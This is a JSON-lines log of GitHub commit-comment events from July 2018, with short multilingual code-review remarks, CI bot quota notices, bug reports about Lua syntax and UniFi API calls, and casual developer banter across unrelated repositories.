{"id":"7943826474","type":"CommitCommentEvent","actor":{"login":"fs-craig"},"repo":{"name":"fsdonks/demand_builder"},"payload":{"comment":{"id":29656628,"position":null,"line":null,"path":null,"commit_id":"5c0a277936df18431633a208b3afc14f1147d5cc","created_at":"2018-07-10T13:33:18Z","updated_at":"2018-07-10T13:33:18Z","author_association":"NONE","body":"I was hoping for something that scrapes the .m2 repo for recently (since a specified point in time) downloaded dependencies and puts these recently downloaded deps into a new .m2 for me to copy to disk and put on SNET so that I don't have to copy the whole .m2 over to SNET every time.  At a glance, I don't think this does that yet.  I asked mike to also cut the sha1 files in the new m2 so that we can kill two birds with one function call."}},"created_at":"2018-07-10T13:33:18Z"}
{"id":"7943836492","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29656645,"position":3,"line":3,"path":"src/Todolist.js","commit_id":"62a37f111004f06c5237701ba575440fd985ccb0","created_at":"2018-07-10T13:34:52Z","updated_at":"2018-07-10T13:34:52Z","author_association":"COLLABORATOR","body":"Refatorar esse componente para ser um `Functional Component`"}},"created_at":"2018-07-10T13:34:52Z"}
{"id":"7943837433","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"IntegratedTransportPlanning/gcvt"},"payload":{"comment":{"id":29656646,"position":null,"line":null,"path":null,"commit_id":"782401f9650a9ce0045c05a4bdf5454d32a463b6","created_at":"2018-07-10T13:35:00Z","updated_at":"2018-07-10T13:35:00Z","author_association":"COLLABORATOR","body":"Looks like this has got pretty technical. Look forward to catching-up properly when I'm on-the-mend. Will send email of explanation. "}},"created_at":"2018-07-10T13:35:00Z"}
{"id":"7943842857","type":"CommitCommentEvent","actor":{"login":"manio"},"repo":{"name":"octo/librouteros"},"payload":{"comment":{"id":29656656,"position":null,"line":null,"path":null,"commit_id":"b020d5c871e57cc765abaf6d0a7721593e2bceed","created_at":"2018-07-10T13:35:52Z","updated_at":"2018-07-10T13:35:52Z","author_association":"COLLABORATOR","body":"Sure, please do so."}},"created_at":"2018-07-10T13:35:52Z"}
{"id":"7943843552","type":"CommitCommentEvent","actor":{"login":"Scottd125"},"repo":{"name":"nath-thoms/kingu-bot"},"payload":{"comment":{"id":29656659,"position":null,"line":null,"path":null,"commit_id":"f182bbcd097589e0f9ebcdaa69e326280ef98be1","created_at":"2018-07-10T13:35:59Z","updated_at":"2018-07-10T13:35:59Z","author_association":"COLLABORATOR","body":"No worries. I would have thought a senior React developer would have had a lot more to offer however\r\n![smug](https://user-images.githubusercontent.com/31902527/42513321-89b98c1e-844e-11e8-8b33-45ae37cfe1d3.png)"}},"created_at":"2018-07-10T13:35:59Z"}
{"id":"7943846047","type":"CommitCommentEvent","actor":{"login":"trumpeta"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29656662,"position":null,"line":null,"path":null,"commit_id":"16c19cc0d55d7fae329643983d181bb1e5ad8b33","created_at":"2018-07-10T13:36:23Z","updated_at":"2018-07-10T13:36:23Z","author_association":"NONE","body":"The patches are in clash with MVPS hosts entries:\r\n\r\n`adserver.adtech.de`\r\n`pro.hit.gemius.pl`\r\n\r\nso the video still won't work for anybody using MVPS hosts without additional user hack.\r\nBetter to block the ab detection script:\r\n`https://www.reddit.com/r/uBlockOrigin/comments/8xnxn8/which_scriptinject_macro_to_neutralize_adblock/`\r\nAny ideas?"}},"created_at":"2018-07-10T13:36:23Z"}
{"id":"7943851584","type":"CommitCommentEvent","actor":{"login":"sylvblck"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656673,"position":333,"line":333,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:37:16Z","updated_at":"2018-07-10T13:37:16Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-10T13:37:16Z"}
{"id":"7943852264","type":"CommitCommentEvent","actor":{"login":"sylvblck"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656677,"position":336,"line":336,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:37:22Z","updated_at":"2018-07-10T13:37:22Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-10T13:37:22Z"}
{"id":"7943855870","type":"CommitCommentEvent","actor":{"login":"justvanrossum"},"repo":{"name":"typesupply/defcon"},"payload":{"comment":{"id":29656684,"position":null,"line":null,"path":null,"commit_id":"bce898c1c2e6b24c4774fe9ca6f7a9f5b80ed6a0","created_at":"2018-07-10T13:37:57Z","updated_at":"2018-07-10T13:37:57Z","author_association":"NONE","body":"I would prefer an exception, but I bet that will break other things."}},"created_at":"2018-07-10T13:37:57Z"}
{"id":"7943857241","type":"CommitCommentEvent","actor":{"login":"jhabdas"},"repo":{"name":"MattMattV/after-dark"},"payload":{"comment":{"id":29656691,"position":null,"line":null,"path":null,"commit_id":"19fa17bdb044830f31bfb7e0be2a025a37899d26","created_at":"2018-07-10T13:38:11Z","updated_at":"2018-07-10T13:38:11Z","author_association":"NONE","body":"> despite having smashed hard F5\r\n\r\nlmao (๑˃ᴗ˂)ﻭ\r\n\r\nHope you beat me to it. :D"}},"created_at":"2018-07-10T13:38:11Z"}
{"id":"7943863588","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29656708,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-10T13:39:12Z","updated_at":"2018-07-10T13:39:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T13:39:12Z"}
{"id":"7943864102","type":"CommitCommentEvent","actor":{"login":"justvanrossum"},"repo":{"name":"typesupply/defcon"},"payload":{"comment":{"id":29656709,"position":null,"line":null,"path":null,"commit_id":"bce898c1c2e6b24c4774fe9ca6f7a9f5b80ed6a0","created_at":"2018-07-10T13:39:16Z","updated_at":"2018-07-10T13:39:16Z","author_association":"NONE","body":"Or possibly a `None` result, like what `bounds` would return for an empty glyph."}},"created_at":"2018-07-10T13:39:16Z"}
{"id":"7943866279","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29656715,"position":13,"line":13,"path":"src/Orders.js","commit_id":"4425d4e2a314153d690aea6068b216fa2f18dc47","created_at":"2018-07-10T13:39:37Z","updated_at":"2018-07-10T13:39:37Z","author_association":"COLLABORATOR","body":"Não existe outra variável nesse escopo chamada `orderBy`, então o alias para `currentOrderBy` se torna desnecessário."}},"created_at":"2018-07-10T13:39:37Z"}
{"id":"7943872641","type":"CommitCommentEvent","actor":{"login":"vbanos"},"repo":{"name":"ftsalamp/wayback-discover-diff"},"payload":{"comment":{"id":29656728,"position":21,"line":22,"path":"wayback_discover_diff/discover.py","commit_id":"7795927f246a228053b787c51413fff4f66aa988","created_at":"2018-07-10T13:40:35Z","updated_at":"2018-07-10T13:40:35Z","author_association":"NONE","body":"Theoretically, there should be NO redirects because we retrieve only the records with status=200 and we avoid revisit records which redirect to status=200 records.\r\nSometimes though, there are redirects in status=200 records.\r\nI suggest use max redirects = 1"}},"created_at":"2018-07-10T13:40:35Z"}
{"id":"7943873456","type":"CommitCommentEvent","actor":{"login":"nath-thoms"},"repo":{"name":"nath-thoms/kingu-bot"},"payload":{"comment":{"id":29656738,"position":null,"line":null,"path":null,"commit_id":"f182bbcd097589e0f9ebcdaa69e326280ef98be1","created_at":"2018-07-10T13:40:43Z","updated_at":"2018-07-10T13:40:43Z","author_association":"OWNER","body":"> No worries. I would have thought a senior React developer would have had a lot more to offer however \r\n\r\nThat's because this isn't React, and i'm out of my depth..."}},"created_at":"2018-07-10T13:40:43Z"}
{"id":"7943873677","type":"CommitCommentEvent","actor":{"login":"ojaswa1942"},"repo":{"name":"ojaswa1942/JS_Snake_Game"},"payload":{"comment":{"id":29656740,"position":null,"line":null,"path":null,"commit_id":"8255a2909daf6041ff7f857560c80bc48954f21b","created_at":"2018-07-10T13:40:45Z","updated_at":"2018-07-10T13:40:45Z","author_association":"OWNER","body":"The box doesn't resize itself with browser. Also, user has to scroll to adjust the correct frame and it seems slightly larger [According to this](https://sivarampg.github.io/JS_Snake_Game/)"}},"created_at":"2018-07-10T13:40:45Z"}
{"id":"7943874874","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29656745,"position":692,"line":692,"path":"odoo/addons/test_read_group/tests/test_fill_temporal.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T13:40:56Z","updated_at":"2018-07-10T13:40:56Z","author_association":"MEMBER","body":"That period of time is winter time, and thus midnight is `23:00` in UTC."}},"created_at":"2018-07-10T13:40:56Z"}
{"id":"7943882358","type":"CommitCommentEvent","actor":{"login":"CristobalM"},"repo":{"name":"DCC-CC4401/2018-1-0xA-T3"},"payload":{"comment":{"id":29656762,"position":null,"line":null,"path":null,"commit_id":"9bf7383d1ff7701dfb89cb6ab8f68dedeee4442b","created_at":"2018-07-10T13:42:08Z","updated_at":"2018-07-10T13:42:08Z","author_association":"CONTRIBUTOR","body":"Sus wenos commit"}},"created_at":"2018-07-10T13:42:08Z"}
{"id":"7943885424","type":"CommitCommentEvent","actor":{"login":"barisusakli"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":29656773,"position":null,"line":null,"path":null,"commit_id":"85a55d1740dbbb224cd4aa0e5974cf0650fcd06e","created_at":"2018-07-10T13:42:33Z","updated_at":"2018-07-10T13:42:33Z","author_association":"MEMBER","body":"https://github.com/NodeBB/NodeBB/issues/6637"}},"created_at":"2018-07-10T13:42:33Z"}
{"id":"7943895694","type":"CommitCommentEvent","actor":{"login":"robdrysdale"},"repo":{"name":"jupyterhub/oauthenticator"},"payload":{"comment":{"id":29656785,"position":null,"line":null,"path":null,"commit_id":"996e2759eacf1b4abb78174251d8958f1936d550","created_at":"2018-07-10T13:44:12Z","updated_at":"2018-07-10T13:44:12Z","author_association":"NONE","body":"This is causing an error for me.  USERDATA_URL is a GET request, so doesn't accept anything in the body"}},"created_at":"2018-07-10T13:44:12Z"}
{"id":"7943897083","type":"CommitCommentEvent","actor":{"login":"MattMattV"},"repo":{"name":"MattMattV/after-dark"},"payload":{"comment":{"id":29656792,"position":null,"line":null,"path":null,"commit_id":"19fa17bdb044830f31bfb7e0be2a025a37899d26","created_at":"2018-07-10T13:44:25Z","updated_at":"2018-07-10T13:44:25Z","author_association":"OWNER","body":"is that a race ? :smile: :racing_car:"}},"created_at":"2018-07-10T13:44:25Z"}
{"id":"7943900390","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29656801,"position":null,"line":null,"path":null,"commit_id":"624648558eb1e88d02fa85bb22de38e7235e20c3","created_at":"2018-07-10T13:44:55Z","updated_at":"2018-07-10T13:44:55Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `6cbfff14-8447-11e8-8454-f5ff6000862d`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T13:44:55Z"}
{"id":"7943900495","type":"CommitCommentEvent","actor":{"login":"tishayaem"},"repo":{"name":"albertpai/Kodflix"},"payload":{"comment":{"id":29656802,"position":null,"line":null,"path":null,"commit_id":"6b3a76257c2fb62ea1791a96de78796e3a6d26bc","created_at":"2018-07-10T13:44:56Z","updated_at":"2018-07-10T13:44:56Z","author_association":"COLLABORATOR","body":"Unnecessary coma"}},"created_at":"2018-07-10T13:44:56Z"}
{"id":"7943903469","type":"CommitCommentEvent","actor":{"login":"tishayaem"},"repo":{"name":"albertpai/Kodflix"},"payload":{"comment":{"id":29656814,"position":9,"line":9,"path":"src/Details/Details.js","commit_id":"6b3a76257c2fb62ea1791a96de78796e3a6d26bc","created_at":"2018-07-10T13:45:24Z","updated_at":"2018-07-10T13:45:24Z","author_association":"COLLABORATOR","body":"Here!"}},"created_at":"2018-07-10T13:45:24Z"}
{"id":"7943907768","type":"CommitCommentEvent","actor":{"login":"Warafux"},"repo":{"name":"Art-of-WiFi/UniFi-API-client"},"payload":{"comment":{"id":29656822,"position":null,"line":null,"path":null,"commit_id":"4dddd08d8bf6d6fcd0e3ed73ef8e1a4aab666ef1","created_at":"2018-07-10T13:46:03Z","updated_at":"2018-07-10T13:46:03Z","author_association":"NONE","body":"I'm trying one of the new functions forget_sta() which is only available for controller version 5.9.* and higher. But I can't certainly update my controller to that version, I'm stuck at  5.8.24-11016. I've already checked for updates but an \"up to date\" message appears. Also set the debug flag to TRUE and this is what returned to me:\r\n\r\n------URL & PAYLOAD---------\r\nhttps://<IP>:8443/api/s/default/cmd/stamgr\r\njson={\"cmd\":\"forget-sta\",\"macs\":[\"<MAC>\"]}\r\n----------RESPONSE-----------\r\n{ \"data\" : [ ] , \"meta\" : { \"msg\" : \"api.err.NotFound\" , \"rc\" : \"error\"}}\r\n-----------------------------"}},"created_at":"2018-07-10T13:46:03Z"}
{"id":"7943908613","type":"CommitCommentEvent","actor":{"login":"tishayaem"},"repo":{"name":"albertpai/Kodflix"},"payload":{"comment":{"id":29656823,"position":17,"line":17,"path":"src/Details/Details.js","commit_id":"6b3a76257c2fb62ea1791a96de78796e3a6d26bc","created_at":"2018-07-10T13:46:11Z","updated_at":"2018-07-10T13:46:11Z","author_association":"COLLABORATOR","body":"The name of the function must describe it's functionality"}},"created_at":"2018-07-10T13:46:11Z"}
{"id":"7943912696","type":"CommitCommentEvent","actor":{"login":"albertpai"},"repo":{"name":"albertpai/Kodflix"},"payload":{"comment":{"id":29656830,"position":null,"line":null,"path":null,"commit_id":"6b3a76257c2fb62ea1791a96de78796e3a6d26bc","created_at":"2018-07-10T13:46:49Z","updated_at":"2018-07-10T13:46:49Z","author_association":"OWNER","body":"Thanks! I will delete it in the next commit."}},"created_at":"2018-07-10T13:46:49Z"}
{"id":"7943913722","type":"CommitCommentEvent","actor":{"login":"dianaosmani"},"repo":{"name":"dianaosmani/odicci-tutorials"},"payload":{"comment":{"id":29656832,"position":51,"line":51,"path":"bower_components/iron-image/demo/index.html","commit_id":"205a4db9f2a6f11c321013890a455cfc81b0de19","created_at":"2018-07-10T13:46:59Z","updated_at":"2018-07-10T13:46:59Z","author_association":"OWNER","body":"what you on about? @baenans "}},"created_at":"2018-07-10T13:46:59Z"}
{"id":"7943916631","type":"CommitCommentEvent","actor":{"login":"jinjingfarm"},"repo":{"name":"InterPSS-Project/ipss-plugin"},"payload":{"comment":{"id":29656840,"position":null,"line":null,"path":null,"commit_id":"fd890d14a457c4d118d58697d4481fd2f106cb6a","created_at":"2018-07-10T13:47:26Z","updated_at":"2018-07-10T13:47:26Z","author_association":"CONTRIBUTOR","body":"Compiling errors are cleared. Please try again."}},"created_at":"2018-07-10T13:47:26Z"}
{"id":"7943918396","type":"CommitCommentEvent","actor":{"login":"Meakelra"},"repo":{"name":"Meakelra/LinuxTest"},"payload":{"comment":{"id":29656857,"position":null,"line":null,"path":null,"commit_id":"b50ebda786c85b91479f91f7671f797fd74fd5c5","created_at":"2018-07-10T13:47:41Z","updated_at":"2018-07-10T13:47:41Z","author_association":"OWNER","body":"124235346574568"}},"created_at":"2018-07-10T13:47:41Z"}
{"id":"7943921307","type":"CommitCommentEvent","actor":{"login":"albertpai"},"repo":{"name":"albertpai/Kodflix"},"payload":{"comment":{"id":29656881,"position":17,"line":17,"path":"src/Details/Details.js","commit_id":"6b3a76257c2fb62ea1791a96de78796e3a6d26bc","created_at":"2018-07-10T13:48:08Z","updated_at":"2018-07-10T13:48:08Z","author_association":"OWNER","body":"Thanks! I will change it in the next commit."}},"created_at":"2018-07-10T13:48:08Z"}
{"id":"7943923221","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29656893,"position":null,"line":null,"path":null,"commit_id":"787b46c9f372188238f1fa127a3c6b5aa33aa401","created_at":"2018-07-10T13:48:24Z","updated_at":"2018-07-10T13:48:24Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `e9125972-8447-11e8-8eee-356aaf721f20`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T13:48:24Z"}
{"id":"7943923914","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29656897,"position":67,"line":112,"path":"src/App.js","commit_id":"62a37f111004f06c5237701ba575440fd985ccb0","created_at":"2018-07-10T13:48:30Z","updated_at":"2018-07-10T13:48:30Z","author_association":"COLLABORATOR","body":"Aqui poderia ser usado o método [without](https://lodash.com/docs/4.17.10#without) do `lodash`."}},"created_at":"2018-07-10T13:48:30Z"}
{"id":"7943924672","type":"CommitCommentEvent","actor":{"login":"baenans"},"repo":{"name":"dianaosmani/odicci-tutorials"},"payload":{"comment":{"id":29656904,"position":51,"line":51,"path":"bower_components/iron-image/demo/index.html","commit_id":"205a4db9f2a6f11c321013890a455cfc81b0de19","created_at":"2018-07-10T13:48:37Z","updated_at":"2018-07-10T13:48:37Z","author_association":"COLLABORATOR","body":"This basically is code copied from another project, so I did not develop anything here @dianaosmani "}},"created_at":"2018-07-10T13:48:37Z"}
{"id":"7943924937","type":"CommitCommentEvent","actor":{"login":"JoschD"},"repo":{"name":"pylhc/Beta-Beat.src"},"payload":{"comment":{"id":29656907,"position":null,"line":null,"path":null,"commit_id":"d071b35988adc5bc2474efea7124f2e8b984a5cf","created_at":"2018-07-10T13:48:40Z","updated_at":"2018-07-10T13:48:40Z","author_association":"CONTRIBUTOR","body":"I just had a look at this commit, because the title was VERY suspicious!!\r\nIf you want to further simplify your _get_sign function:\r\n\r\nreturn (-1)**((beam==BEAM1) + (plane==HOR))"}},"created_at":"2018-07-10T13:48:40Z"}
{"id":"7943929341","type":"CommitCommentEvent","actor":{"login":"xxLestadxx"},"repo":{"name":"xxLestadxx/DropTheBeat"},"payload":{"comment":{"id":29656930,"position":null,"line":null,"path":null,"commit_id":"639ba0714f80deb2db53bdaa9286e180c9e22824","created_at":"2018-07-10T13:49:17Z","updated_at":"2018-07-10T13:49:17Z","author_association":"OWNER","body":"It was only because I was still testing and adding just the needed dependencies :D You can see that later i had a more meaningful comment ^_^ "}},"created_at":"2018-07-10T13:49:17Z"}
{"id":"7943929801","type":"CommitCommentEvent","actor":{"login":"alexraputa"},"repo":{"name":"yiisoft/di"},"payload":{"comment":{"id":29656933,"position":5,"line":245,"path":"src/AbstractContainer.php","commit_id":"0cd5fc2a0edb12f6acd79c8506fa056120f35e6d","created_at":"2018-07-10T13:49:21Z","updated_at":"2018-07-10T13:49:21Z","author_association":"NONE","body":"camelCase?"}},"created_at":"2018-07-10T13:49:21Z"}
{"id":"7943930515","type":"CommitCommentEvent","actor":{"login":"Scottd125"},"repo":{"name":"nath-thoms/kingu-bot"},"payload":{"comment":{"id":29656940,"position":null,"line":null,"path":null,"commit_id":"f182bbcd097589e0f9ebcdaa69e326280ef98be1","created_at":"2018-07-10T13:49:28Z","updated_at":"2018-07-10T13:49:28Z","author_association":"COLLABORATOR","body":"![woof](https://user-images.githubusercontent.com/31902527/42514079-714eaa86-8450-11e8-9343-d14d37b3cb12.png)\r\n"}},"created_at":"2018-07-10T13:49:28Z"}
{"id":"7943932252","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29656948,"position":18,"line":2297,"path":"fabfile.py","commit_id":"64be70198389726754101009260530d4da1a11f9","created_at":"2018-07-10T13:49:43Z","updated_at":"2018-07-10T13:49:43Z","author_association":"CONTRIBUTOR","body":"genereated => generated"}},"created_at":"2018-07-10T13:49:43Z"}
{"id":"7943933074","type":"CommitCommentEvent","actor":{"login":"DenisKenzo"},"repo":{"name":"Doc999tor/Customers-details"},"payload":{"comment":{"id":29656953,"position":null,"line":null,"path":null,"commit_id":"80a681af7f024be4f15eaebcbaec13252eac7483","created_at":"2018-07-10T13:49:51Z","updated_at":"2018-07-10T13:49:51Z","author_association":"CONTRIBUTOR","body":"сделал следующее: когда пол не выбран, иконка креста(отмена выбора) - не отображается"}},"created_at":"2018-07-10T13:49:51Z"}
{"id":"7943933496","type":"CommitCommentEvent","actor":{"login":"generalisofficial"},"repo":{"name":"swf541/Cold-War--The-Iron-Curtain"},"payload":{"comment":{"id":29656957,"position":null,"line":null,"path":null,"commit_id":"8e07e7ec2fd8872d9c6c075ab5060bc3f5fc8d77","created_at":"2018-07-10T13:49:55Z","updated_at":"2018-07-10T13:49:55Z","author_association":"COLLABORATOR","body":"whats a flage"}},"created_at":"2018-07-10T13:49:55Z"}
{"id":"7943948160","type":"CommitCommentEvent","actor":{"login":"Gottox"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29656997,"position":3,"line":3,"path":"srcpkgs/mbox/template","commit_id":"2ea36e362401168914b1815ecb92e584a29b9f41","created_at":"2018-07-10T13:52:11Z","updated_at":"2018-07-10T13:52:11Z","author_association":"MEMBER","body":"Unstable version. It would've been nice if you could've open a pull request."}},"created_at":"2018-07-10T13:52:11Z"}
{"id":"7943949908","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29657005,"position":null,"line":null,"path":null,"commit_id":"64be70198389726754101009260530d4da1a11f9","created_at":"2018-07-10T13:52:26Z","updated_at":"2018-07-10T13:52:26Z","author_association":"CONTRIBUTOR","body":"Cool, you apparently successfully created a `assembl-graphql-schema-json` where I previously failed.\r\nCan you please modify the flow/README instructions to use it as well? Thanks."}},"created_at":"2018-07-10T13:52:26Z"}
{"id":"7943949920","type":"CommitCommentEvent","actor":{"login":"Csomi"},"repo":{"name":"analogdevicesinc/hdl"},"payload":{"comment":{"id":29657006,"position":13,"line":74,"path":"projects/scripts/adi_board.tcl","commit_id":"0c04f17304b8e5a4bad56853b7eabdcd151d0058","created_at":"2018-07-10T13:52:26Z","updated_at":"2018-07-10T13:52:26Z","author_association":"CONTRIBUTOR","body":"Good catch, thanks!"}},"created_at":"2018-07-10T13:52:26Z"}
{"id":"7943952571","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29657019,"position":74,"line":118,"path":"src/App.js","commit_id":"62a37f111004f06c5237701ba575440fd985ccb0","created_at":"2018-07-10T13:52:50Z","updated_at":"2018-07-10T13:52:50Z","author_association":"COLLABORATOR","body":"Descobrir um método de atualizar a `todolist` sem alterar o `todoItem`, aplicando o conceito de `imutabilidade`, ou seja, criar um novo objeto com base no antigo (todoItem), e substituir o antigo objeto na atual `todolist`. Também não alterar a `todolist`, efetuar como foi feito logo acima, usando algum método que gere uma nova lista com base na antiga (Array#filter faz isso, se testar no console, vai notar que o array antigo não é alterado, é sempre gerado um novo array com base no predicate passado por parâmetro)."}},"created_at":"2018-07-10T13:52:50Z"}
{"id":"7943959696","type":"CommitCommentEvent","actor":{"login":"Gottox"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29657032,"position":null,"line":null,"path":null,"commit_id":"2ea36e362401168914b1815ecb92e584a29b9f41","created_at":"2018-07-10T13:53:55Z","updated_at":"2018-07-10T13:53:55Z","author_association":"MEMBER","body":"This package is broken. Are patches missing?"}},"created_at":"2018-07-10T13:53:55Z"}
{"id":"7943960464","type":"CommitCommentEvent","actor":{"login":"voltovo"},"repo":{"name":"voltovo/choiceman"},"payload":{"comment":{"id":29657034,"position":19,"line":63,"path":"WebContent/BarrierOne.html","commit_id":"fda49d9986ec026bd4cb975503fa2a6d96f09ab9","created_at":"2018-07-10T13:54:02Z","updated_at":"2018-07-10T13:54:02Z","author_association":"OWNER","body":"주석 처리 완료"}},"created_at":"2018-07-10T13:54:02Z"}
{"id":"7943961044","type":"CommitCommentEvent","actor":{"login":"juan-vg"},"repo":{"name":"juan-vg/mod_push_appserver"},"payload":{"comment":{"id":29657035,"position":11,"line":197,"path":"mod_push_appserver_apns/mod_push_appserver_apns.lua","commit_id":"98b2aea716ac72b899eb8825d05478e7d1674072","created_at":"2018-07-10T13:54:08Z","updated_at":"2018-07-10T13:54:08Z","author_association":"OWNER","body":"This inline condition is not Lua. I get the error: \"Unable to load module 'push_appserver_apns': /etc/prosody/modules/mod_push_appserver_apns/mod_push_appserver_apns.lua:197: unexpected symbol near '?'\""}},"created_at":"2018-07-10T13:54:08Z"}
{"id":"7943961069","type":"CommitCommentEvent","actor":{"login":"romanlinka"},"repo":{"name":"romanlinka/ChessboardMarker"},"payload":{"comment":{"id":29657036,"position":15,"line":15,"path":"ChessboardMarkerDetection/main.cpp","commit_id":"3e76f647e80c6cb75b4e813f4cf14a00a577b470","created_at":"2018-07-10T13:54:08Z","updated_at":"2018-07-10T13:54:08Z","author_association":"OWNER","body":"Komentarze do linii\r\n"}},"created_at":"2018-07-10T13:54:08Z"}
{"id":"7943965057","type":"CommitCommentEvent","actor":{"login":"juan-vg"},"repo":{"name":"tmolitor-stud-tu/mod_push_appserver"},"payload":{"comment":{"id":29657043,"position":11,"line":197,"path":"mod_push_appserver_apns/mod_push_appserver_apns.lua","commit_id":"98b2aea716ac72b899eb8825d05478e7d1674072","created_at":"2018-07-10T13:54:43Z","updated_at":"2018-07-10T13:54:43Z","author_association":"NONE","body":"This inline condition is not Lua. I get the error: \"Unable to load module 'push_appserver_apns': /etc/prosody/modules/mod_push_appserver_apns/mod_push_appserver_apns.lua:197: unexpected symbol near '?'\""}},"created_at":"2018-07-10T13:54:43Z"}
{"id":"7943965978","type":"CommitCommentEvent","actor":{"login":"voltovo"},"repo":{"name":"voltovo/choiceman"},"payload":{"comment":{"id":29657048,"position":19,"line":63,"path":"WebContent/BarrierOne.html","commit_id":"fda49d9986ec026bd4cb975503fa2a6d96f09ab9","created_at":"2018-07-10T13:54:51Z","updated_at":"2018-07-10T13:54:51Z","author_association":"OWNER","body":"ㄴㄴㄴ"}},"created_at":"2018-07-10T13:54:51Z"}
{"id":"7943966402","type":"CommitCommentEvent","actor":{"login":"romanlinka"},"repo":{"name":"romanlinka/ChessboardMarker"},"payload":{"comment":{"id":29657049,"position":28,"line":28,"path":"ChessboardMarkerDetection/main.cpp","commit_id":"3e76f647e80c6cb75b4e813f4cf14a00a577b470","created_at":"2018-07-10T13:54:55Z","updated_at":"2018-07-10T13:54:55Z","author_association":"OWNER","body":"Możliwość dodawania komentarzy w commitach \r\n"}},"created_at":"2018-07-10T13:54:55Z"}
{"id":"7943966552","type":"CommitCommentEvent","actor":{"login":"jaimecp89"},"repo":{"name":"pylhc/Beta-Beat.src"},"payload":{"comment":{"id":29657050,"position":null,"line":null,"path":null,"commit_id":"d071b35988adc5bc2474efea7124f2e8b984a5cf","created_at":"2018-07-10T13:54:56Z","updated_at":"2018-07-10T13:54:56Z","author_association":"CONTRIBUTOR","body":"Haha, is that really simpler?\r\nActually we think there is an error in that function... the signs were not correct in the results."}},"created_at":"2018-07-10T13:54:56Z"}
